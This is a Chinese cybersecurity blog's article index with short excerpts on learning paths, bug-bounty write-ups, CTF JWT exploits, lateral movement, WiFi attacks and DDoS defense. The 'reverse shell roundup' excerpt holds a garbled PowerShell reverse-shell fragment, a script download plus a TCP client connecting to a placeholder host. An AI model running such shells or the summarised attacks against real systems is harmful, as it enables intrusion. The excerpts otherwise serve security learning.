自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(40)
  • 收藏
  • 关注

原创 记某src通过越权拿下高危漏洞

在挖掘某SRC时,遇到了一个社区网站,社区站点是我在挖掘SRC时比较愿意遇到的,因为它们可探索的内容是较多的,幸运地,通过两个接口构造参数可进行越权,从而获得整个网站用户的信息。测试完,就可以去写报告提交了,坐等高危的到来。

2024-05-16 13:48:59 523

原创 网络安全学习路线+自学笔记(超详细) 自学网络安全看这一篇就够了

网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。

2024-05-13 13:52:15 812

原创 自学黑客技术(网络安全)后,我的人生开挂了!

我在之前的回答中,我都一再强调不要以编程为基础再开始学习网络安全,一般来说,学习编程不但学习周期长,而且实际向安全过渡后可用到的关键知识并不多一般人如果想要把编程学好再开始学习网络安全往往需要花费很长时间,容易半途而废。而且学习编程只是工具不是目的,我们的目标不是成为程序员。建议在学习网络安全的过程中,哪里不会补哪里,这样更有目的性且耗时更少。很多人都是冲着要把网络安全学好学扎实来的,于是就很容易用力过猛,陷入一个误区:就是把所有的内容都要进行深度学习,但是把深度学习作为网络安全第一课不是个好主意。

2024-05-11 15:58:24 1195

原创 现在2024年网络安全真实情况还好就业吗?

安全现在是大趋势,说是铁饭碗也不为过,就业前景好,方向多比传统计算机行业就业舒服点。但是大厂依然是985,211的天下,是双非能进大厂的,只是凤毛麟角。前提是你的能力可以让公司忽略你的学历。 IT行业一直都是很看中技术的,技术一直迭代更新,从业人员得一直保持学习的心态。

2024-05-08 10:08:30 1612

原创 【科普】关于网络安全你了解多少?什么是网络安全?(附学习资料)

“网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露、系统连续可靠正常地运行,网络服务不中断。”说白了网络安全就是维护网络系统上的信息安全。

2024-05-06 11:19:26 1285

原创 网络安全就业方向详解+零基础入门学网络安全知识点详解

给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。给自学的小伙伴们的意见是坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果!!

2024-04-30 13:50:06 1508

原创 网络安全的重要性及人才需求

能从事政府部分的安全规范和安全管理,包括法律的制定,也能从事安全企业的安全产品的研发,还能从事一般企业的安全管理和安全防护,国与国之间的空间安全的协调。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。因为漏洞是依赖于产品的,产品更新换代,漏洞也会更新换代。

2024-04-29 09:23:34 1106 4

原创 2024自学网络安全学习路线+方法

这个路线图已经详细到每周要学什么内容,学到什么程度,可以说我整理的这个Web安全路线图对新人是非常友好的,除此之外,我还给团队小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。

2024-04-23 15:30:35 980

原创 零基础入门网络安全学习路线+学习方法(超详细)

既然是攻防了,肯定要懂攻击,要有一定的编程语言能力,要登录系统应急,那就要懂操作系统、懂中间件、懂数据库,因此总结下来,入门需要操作系统+中间件配置+数据库+高级攻防 当然作为产品工程师就真的不需要懂操作系统吗,显然不是,国内大多数安全产品都是基于开源linux开发的,不懂的话,出现设备异常了怎么进入设备后台调试。产品都是部署在网络上的,所以想入门产品,首先要入门的是网络基础(思科华为华三都可以),在一个需要调试安全策略,所以需要懂基本的安全知识和原理,总结下来,安全产品入门需要 网络基础+基础攻防。

2024-04-18 14:45:50 653

原创 一种动态防御策略——移动目标防御(MTD)

其次,恶意软件可以绕过更深入的静态分析,因为其代码和数据是加密的,因此不会暴露在扫描仪面前。在这种情况下,攻击的成本会急剧上升,而成功的概率则会下降到接近于零。人工智能和机器学习确实能更好、更快地进行检测,但也受到限制,因为要检测到威胁,需要对威胁有一定程度的了解,且高级闪避攻击仍具有不可预测性。网络攻击的技术变得愈发难测,网络攻击者用多态性、混淆、加密和自我修改乔装他们的恶意软件,以此逃避防御性的检测,于是移动目标防御(MTD)技术出现了,通过动态地改变攻击面,有效地对抗日益复杂和隐蔽的网络攻击。

2024-04-17 14:19:39 855

原创 hook某银行加固app

attachBaseContext方法被attach调用,而大部分的壳都是在attachBaseContext这个方法里面去完成代码的解密,使用加固之后的应用的classloader会被换成其加固应用本身的。要在未修复dex并打包情况下对其app内在类进行hook,单纯的hook会由于加固的问题而导致加载不到内在想hook的类。在写hook的过程,发现其加密的发现是调用了android的原生包中的类android.util.Base64。利用加载到的classloader再次对样本app的类进行hook。

2024-04-16 10:46:53 423

原创 浅谈网络代理 proxy

关于搭建自己的代理池这个话题,不建议从零开始写一个,github上有很多优秀的案例,可以基于他们的思路扩展,而不是重复造轮子orz。检测代理是否可用分为了三个方法,在validator.py文件里,需要三个方法同时返回True,才说明代理是可用的。所以其实我们要先去获取API接口返回的IP列表,然后在使用代理的时候带上自己的用户名密码,即。扩展的话我们定义新的代理网站的静态方法,并且在setting.py文件进行设置,就可以使用了。免费代理的网站很多,但是存活率,可用率很低,需要自己去重验活,比如。

2024-04-15 13:31:11 1479

原创 2024最新高频渗透测试面试题,啃完直通大厂

2024的金三银四即将结束,不知道大家有没有找到心仪的工作呀,今天给大家整理了100道渗透测试面试题,都是今年被问到的高频题目。

2024-04-11 16:38:20 1074

原创 反弹shell方式汇总

攻击机:目标机:或者保存为lltest_tcp.ps1文件WebClient).lltest_tcp.ps1 如下:function$clientSocketsTCPClient'[host]'[port]$stream$clientGetStream();

2024-04-09 10:43:38 655

原创 安全威胁情报的漏洞挖掘

以上就是关于安全威胁情报的一些漏洞挖掘技巧,随着当前网站数量越来越多,很多网站如果运营不到位,有的是域名一过期就被劫持了,有的则是没过期就被嵌入了恶意链接,使得企业形象大大降低,因此我们在网站运营过程中需要不停发检查对外部资源链接的调用,防止因外链被污染加载恶意网站。就比如下面这个很难看出来它是被劫持的,因为太正常了,没有传说中的ss这些,但一想这是事业单位,怎么可能还给你算命和十二星座呢,如果你仔细看,这些IP大都都显示是境外、香港的,不属于国内。再来看一种,也是藏得比较深的,也许不仔细看都不会发现的。

2024-04-08 14:25:32 456

原创 全网最详细的网络安全自学笔记

不建议立即从基础学起,肯定有人给你说学c,学数据结构,学算法,学汇编等等,其实这是不聪明的,目标导向:之前说的每一门都是个大学科,其实用到安全上的 并不多,如果你在暂时用的不多的内容上花费了很多时间,那么你什么时候才能实现自己的目标呀,人的精力是有限的,永远准备好再出发,那是小学生的学习思路。比如 web安全,系统安全,无线安全,二进制安全,运维安全,渗透测试,软件安全,IOT安全,AI安全等等,具体看你想学习哪方面,你一般听到的是web安全,搞个站,玩玩xss,命令注入等等。下面是我推荐的几本书籍。

2024-04-07 14:49:30 1236

原创 记一次安服薅洞实战

子域名、扫扫目录,收集大概就这些了,子域名收集到一个403页面,属实是没怎么见过了一般遇到的访问根目录下就能看到网站页面,只有部分域名下存在多个网站(类似于一台主机中一个目录一个网站)或没做好重定向,所以会出现403。密码md5的可以直接接出来,好家伙直接就是弱口令123,就是用户名有点难猜八成有的人可能不多,格式是这样的“AA001”、“xxxx0000”,大概就是四个字母缩写加四个数字的用户名,这里就不看了。这不就来了吗,访问搞到多个网站,全都是直接跳转到登录页面。祝各位师傅天天好运气!

2024-04-07 13:44:23 314

原创 CTF比赛中JWT漏洞的利用

当随后使用此方法的网站开发人员假设它将专门处理使用 RS256 等非对称算法签名的 JWT 时,就会出现问题。在最近的ctf比赛中,经常可以碰到一些jwt相关的题目,然后感觉思路挺有意思,拿出来分享一下,后边也总结一下ctf比较常见的集jwt相关题目解题思路。使用的事RSA算法,弱密钥有点不太现实,试了一下另外两个jwt简单绕过:未对签名进行验证、未对加密算法进行强验证,不过都没成功。在这种情况下,如果服务器收到使用 HS256 等对称算法签名的令牌,则库的通用。原理挺简单的,可以看看我之前的文章。

2024-04-03 11:11:35 640

原创 一定要听劝!网络安全真不是一般人能学的!

本人纯屌丝一枚,在学网络安全之前对电脑的认知也就只限于上个网,大学用WPS写作业交作业之类的。这里不能跑题,我为啥说自学网络安全,一般人我还是劝你算了吧,因为我就是那个一般人(真真正正的一个普通人)。总的来说网络安全基础内容是真的很简单,是个人稍微认真一点都能学懂,但是这也导致了一堆浅学辄止的人轻而易举的就给网络安全打上了简单易学的标签,然后就是一顿浮夸的言论,误导那些小白,再然后那些小白也就跟着浮夸。这里我就给那些轻浮的人泼一桶冷水,懂跟学会那能是一码事吗?

2024-04-02 11:04:46 1080

原创 src挖掘技巧总结分享

这⽆疑极⼤拓宽了 SSRF 的攻击⾯。查看js源码中,查看是否存在api的接口,如果存在如:/api/register/user 则可以尝试是否存在可以利用点,一般情况下就直接拼接api接口,如果返回报错了,这里可以通过burp抓包工具抓包,查看调用的什么接口,让后观察请求的内容是否有地理位置,如果存在,则使用百度或者其他地理位置查询,查询到坐标后,进行修改。比如首月多少6,第二个月开始20,尝试在购买的时候,分别使用两个支付方式支付,然后都支付后,发现是否使用两个6元支付,是否能获得两个月的。

2024-04-02 09:57:29 1781

原创 唱衰的网络安全行业该如何学习才能脱颖而出?

需要注意的是,这里的总结比较笼统和抽象,并不能直接代表实际工作中的技能要求,但基本上也大致总结了网络安全工程师所有的技能要求,按这个路径来走,相信你的路不会很难走。中级网络安全工程师,在初级的基础之上,有很多相同的内容,比如渗透、工具的掌握等,但需要掌握的更加熟练,以及一些业务逻辑也需要了解,如果能有一定的开发能力就更好了。说起网络安全,你可能会担心它是一个过时的行业。有人说,网络安全快卷死了,你既要攻又要防,并且随着技术的发展,你还要不断地学习,不在卷中生,就在卷中死。

2024-04-01 13:44:19 753

原创 蚁剑流量分析

在上面的流量分析种,只不过是套了多层编码,以及编码加入一些脏数据进行混淆,可以很简单的进行还原,但是蚁剑还可以进行对流量进行RSA加密的操作,具体操作如下。可以比较直观的看出,请求体并不再是单纯的url编码了,而是混杂了base64编码,对请求体进行一次url解码。的请求,请求体只是经过了一层url编码,并没有经过过多的编码和加密,再来分析一下base64编码器的情况。的内容是接收一个参数,并将其进行base64解码和执行,而这个参数。将生成的php代码上传到服务器,这段代码的连接参数是。

2024-04-01 10:57:09 766

原创 Miaoo 朋友圈程序审计

【代码】Miaoo 朋友圈程序审计。

2024-03-29 13:32:47 428

原创 超详细的网络安全自学学习路线,零基础入门

网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。

2024-03-28 16:54:53 982

原创 内网横向下的135,445与5985端口利用

技术的工具,该工具通过文件共享在远程系统中创建服务,将要运行的命令通过服务写在 bat 文件中来执行,然后将执行的结果写在文件中来读取执行命令的输出,最后将 bat 文件、输出文件和服务都删除。impacket 中的 atexec.py 脚本,就是利用定时任务获取权限,该脚本的利用需要开启 ipc$共享,通过计划任务服务来在目标主机上实现命令执行,并返回命令执行后的输出结果。,我们不但可以管理本地计算机,还可以管理统一局域网内的所有远程计算机(需要必要的权限),而被管理的计算机不必事先安装。

2024-03-28 13:50:10 696

原创 浅析WIFI攻击手法

Deauth攻击,即解除认证攻击,是一种无线局域网(WLAN)中的拒绝服务攻击,攻击者通过向目标设备发送伪造的解除认证数据包,使目标设备与无线网络断开连接,从而实现对目标设备的控制,原理是因为WiFi管理数据帧没有被加密,导致攻击者可以伪造管理帧,从而让攻击者可以任意发送"取消认证"数据包来强行切断AP与客户端的连接,这种攻击方式不需要破解密码,只需获取目标设备的MAC地址即可实施。这种攻击是创建一个跟目标WIFI相同名称和相同密码的WIFI热点,让受害目标混淆,从而连接上我们的WIFI。

2024-03-28 13:34:07 1273

原创 知乎转发超30K+的Web安全攻防笔记,学网安必备

Web安全是网络安全的重要组成部分,涉及保护网络系统、应用程序和数据免受未经授权的访问、损害或窃取。然而,随之而来的是各种安全威胁和漏洞,如跨站脚本(XSS)、SQL注入、跨站请求伪造(CSRF)等,这些威胁可能会导致用户数据泄露、网站瘫痪甚至财产损失。,感兴趣的朋友可以看一下。

2024-03-27 14:38:08 833

原创 从历史漏洞学习漏洞挖掘

既然这个地方的文件导出功能存在问题,那类似的,其他markdown的导出是否也存在同样的问题呢?直接将上传的文件名进行了,因此在此处是存在目录穿越的,但是由于在保存文件之前进行了文件是否存在校验,所以即使存在目录穿越,也无法进行文件覆盖,从而也不能将数据插入到数据库中。这里只列举了一个类似的网站,感兴趣的师傅可以利用相同的思路,去找找其他相关项目的再测测,说不定会有什么发现。接着会从匹配到的每个字符串中取出括号() 中的内容, 并进行资源目录查找,其中要求了加载资源地址需要是以。

2024-03-26 10:29:28 711

原创 某次锁仓合约应急响应分析记录

客户反映多个月过去没有收到解锁token的原因是因为锁仓合约不是自动按时解锁的,需要主动调用解锁函数去解锁,后经过指导客户进行解锁操作成功解锁375万token,后因为解锁token数量有误差,经过分析查看锁仓合约源代码,发现allocate函数中存在同一变量两次赋值问题,在锁仓过程中真正锁仓的数量只有0.1亿token,由于锁仓合约已经部署完成,无法修改所以目前只能为客户追回的资产总量为0.1亿token(后续每隔3个月解锁一次)。解锁操作后虽然客户账户成功解锁了375万,但是与预期的数量2.4亿/8。

2024-03-26 10:21:15 1142

原创 学网络安全必不可少的《Web Hacking 101》笔记

随着我们的生活越来越依赖于互联网,个人隐私、金融交易、企业数据等敏感信息的安全性备受关注。网络攻击手段的不断演变,如恶意软件、网络钓鱼和勒索软件,给网络安全带来了前所未有的挑战。在这个背景下,保护个人和机构免受网络威胁的侵害变得至关重要,Web安全却“入门简单精通难”,涉及技术非常多且广,学习阻力很大。笔记,包含Web安全知识,例如HTML注入、XSS、CSRF、SQL注入、SSRF等,主要分为描述、实例和总结三部分,语言简练易懂。整理,仅用于学习交流分享,如有侵权请联系删除。为此今天分享一份94页的。

2024-03-25 10:30:03 296

原创 弱密码测试工具blaster使用演示

运行客户端之前,需要对目录内的conf.yaml进行配置,通过调整配置中的参数来满足我们在不同场景的需求。在修改配置时,请务必理解该项的含义后再修改,否则可能会导致非预期的情况。

2024-03-25 10:09:19 863

原创 基于 OPSEC 的 CobaltStrike 后渗透自动化链

在攻防实战中,借助 AutoPostChain 的实现思路可以根据需要对自动化链进行灵活的定制,同时从 OPSEC 的原则考虑,也需要不断的针对不同阶段的木马、工具、手法进行针对性免杀、移植 BOF 等功能来执行敏感命令和进行高危操作,保证自动化链过程中的各类操作足够隐蔽,防止刚上线就触发告警被踢出局。3、已有的自动化链(上线自动执行 whoami 截图等操作)大部分使用 brun、bshell、bspawn 等 CS 原生敏感命令,容易被杀软检测关联到木马进程导致掉线,已不适应如今的攻防场景。

2024-03-25 09:41:26 1492

原创 pickle反序列化漏洞基础知识与绕过简析

的结合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象).其中两个dump函数是把python对象转换为二进制对象的,两个load函数是把二进制对象转换为python对象的.在Python中,面向对象的思想和php是一致的,只是定义类的代码,调用类函数和类属性的方式和php不同.方法且该方法返回一个迭代器对象,那么这个对象就被认为是可迭代的。语言.也就是说在Python中几乎一切皆为对象.这也为我们的绕过提供的不小的便利.

2024-03-25 09:22:09 1192

原创 网络安全知识:什么是移动安全?

加密劫持是一种恶意软件,它在组织或个人不知情的情况下使用其计算能力来挖掘比特币或以太坊等加密货币,从而降低设备的处理能力和效率。

2024-03-22 13:40:51 733

原创 逻辑漏洞挖掘之XSS漏洞原理分析及实战演练

2月份的1.2亿条用户地址信息泄露再次给各大公司敲响了警钟,数据安全的重要性愈加凸显,这也更加坚定了我们推行安全测试常态化的决心。随着测试组安全测试常态化的推进,有更多的同事对逻辑漏洞产生了兴趣,本系列文章旨在揭秘逻辑漏洞的范围、原理及预防措施,逐步提升大家的安全意识。作为开篇第一章,本文选取了广为熟知的XSS逻辑漏洞进行介绍。1.XSS漏洞的定义跨站脚本(Cross Site Script),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本缩写为XSS。

2024-03-22 11:26:58 1279

原创 什么是 DDoS 攻击?如何识别DDoS攻击?如何防御DDOS攻击

当多台机器一起攻击一个目标,通过大量互联网流量淹没目标或其周围基础设施,从而破坏目标服务器、服务或网络的正常流量时,就会发生分布式拒绝服务(DDoS)攻击。DDoS允许向目标发送指数级更多的请求,从而增加攻击能力。它还增加了归因的难度,因为攻击的真正来源更难识别。DDoS攻击可能会对在线业务造成毁灭性打击,因此了解它们的工作原理以及如何快速缓解它们至关重要。执行DDoS攻击的动机差异很大,执行DDoS攻击的个人和组织的类型也各不相同。

2024-03-21 15:04:13 828

原创 如何防御DDOS攻击 DDOS攻击是什么意思

协议攻击:协议攻击针对的是协议工作方式的漏洞,这是第二大最常见的攻击媒介。最常见的容量耗尽攻击类型有UDP洪水攻击。比如现在的网络巨头,他们的服务器都是部署在全国各地的,每个地方都有规模庞大的服务器集群,每个集群的防御能力都在100G以上这就是为何从未发生过互联网巨头的网站被攻击事件的原因。驰网机房定制服务器高防T5级机房,专门针对流量型DDoS攻击和资源耗尽型DDoS攻击(CC攻击)进行云上清洗和过滤,为用户提供专业可靠、精准有效的DDoS安全防护,最大程度保障用户的网络安全和业务正常稳定运行。

2024-03-21 15:01:17 588

原创 DDOS攻击详解及其防御手段

识别安全漏洞并评估针对设置的潜在威胁;防火墙有助于保护计算机免受网络威胁,但它的保护功能仅限于此,并不能识别垃圾请求和无用数据,更谈不上抵御DDOS攻击了。可以将网络服务器想象成一条宽阔的马路,平时车来车往,非常的畅通,但黑客通过投放大量的汽车(即无用数据,垃圾请求)来使这条马路拥堵,阻碍正常的数据,请求等无法及时传送到服务器,从而使服务器无法正常处理数据,响应请求。:通过控制大量控制主机同时连接网站端口,制造大流量无用数据,造成通往被攻击主机的网络拥塞,使被攻击主机无法正常与外界通信。

2024-03-21 14:57:51 314

原创 应急响应篇:windows入侵排查

的存在,在入侵系统后,攻击者可以在计算机上开启专属的端口来访问被害主机或植入病毒用于挖矿等,熟悉计算机的朋友应该都知道常用的端口也就那么几个,所以通过排查可疑端口能确定主机是否存在后门、是否被植入挖矿病毒等,再根据端口的PID对可疑进程对应的程序排查,确定是否为恶意程序。webshell和病毒都是windows系统的大敌,它们可以维持攻击者的系统权限、盗窃资料、感染其他主机、加密文件等,对操作系统造成非常大的危害。而与此同时操作系统也会出现异常,包括账户、端口、进程、网络、启动、服务、任务以及文件等,

2024-03-21 14:51:46 1536

原创 Aircrack-ng网络安全评估和渗透测试

Aircrack-ng是一种流行的渗透测试工具,用于测试Wi-Fi网络的安全性。使用Aircrack-ng,我们可以破解Wi-Fi密码、抓取数据包和分析网络流量等操作。但是,使用Aircrack-ng进行渗透测试需要谨慎,因为未经授权的渗透测试可能会违反法律规定。在进行任何渗透测试之前,请确保您已获得所有必要的授权和许可证。此外,为了保护网络安全,组织应该定期进行渗透测试,并修复所有发现的漏洞和弱点。Aircrack-ng是一种流行的渗透测试工具,用于测试Wi-Fi网络的安全性。

2024-03-21 14:16:00 1151 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除